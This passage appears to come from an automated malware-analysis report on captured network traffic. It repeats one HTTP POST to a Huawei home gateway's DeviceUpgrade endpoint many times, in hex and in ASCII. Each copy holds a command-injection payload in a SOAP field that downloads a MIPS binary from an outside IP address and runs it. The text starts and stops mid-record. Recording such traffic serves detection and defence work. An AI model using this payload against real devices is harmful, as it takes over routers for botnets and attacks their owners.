6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope 